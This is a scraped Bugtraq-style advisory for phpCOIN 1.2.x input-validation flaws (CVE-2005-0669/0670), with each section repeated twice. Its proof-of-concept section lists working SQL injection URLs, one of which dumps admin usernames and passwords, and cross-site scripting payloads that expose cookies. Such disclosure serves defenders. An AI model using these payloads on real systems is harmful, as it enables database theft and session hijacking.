phpCOIN Multiple Remote Input Validation Vulnerabilities
BID:12686
Info
phpCOIN Multiple Remote Input Validation Vulnerabilities
| Bugtraq ID: | 12686 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0669 CVE-2005-0670 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 01 2005 12:00AM |
| Updated: | Feb 24 2010 03:52PM |
| Credit: | Lostmon <[email protected]> is credited with the discovery of this issue. |
| Vulnerable: |
phpCOIN phpCOIN 1.2.1 b phpCOIN phpCOIN 1.2.1 phpCOIN phpCOIN 1.2 |
| Not Vulnerable: | |
Discussion
phpCOIN Multiple Remote Input Validation Vulnerabilities
Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality.
An attacker may leverage these issues to manipulate and view arbitrary database contents (by exploiting various SQL-injection issues) and to run arbitrary script code in the browser of an unsuspecting user (by exploiting multiple cross-site scripting vulnerabilities).
Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality.
An attacker may leverage these issues to manipulate and view arbitrary database contents (by exploiting various SQL-injection issues) and to run arbitrary script code in the browser of an unsuspecting user (by exploiting multiple cross-site scripting vulnerabilities).
Exploit / POC
phpCOIN Multiple Remote Input Validation Vulnerabilities
No exploit is required to leverage any of these issues. The following proofs of concept have been provided:
SQL injection:
http://www.example.com/phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://www.example.com/phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://www.example.com/phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://www.example.com/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
Cross-site scripting:
http://www.example.com/phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://www.example.com/phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://www.example.com/phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
No exploit is required to leverage any of these issues. The following proofs of concept have been provided:
SQL injection:
http://www.example.com/phpcoin/mod.php?mod=faq&mode=show&faq_id=2%20or%201=1
http://www.example.com/phpcoin/mod.php?mod=pages&mode=view&id=25%20or%201=1
http://www.example.com/phpcoin/mod.php?mod=siteinfo&id=4%20or%201=1
http://www.example.com/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
Cross-site scripting:
http://www.example.com/phpcoin/mod.php?mod=helpdesk&mode=new
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://www.example.com/phpcoin/mod.php?mod=mail&mode=reset&w=user
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
http://www.example.com/phpcoin/login.php?w=user&o=login&e=u
%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E
Solution / Fix
phpCOIN Multiple Remote Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].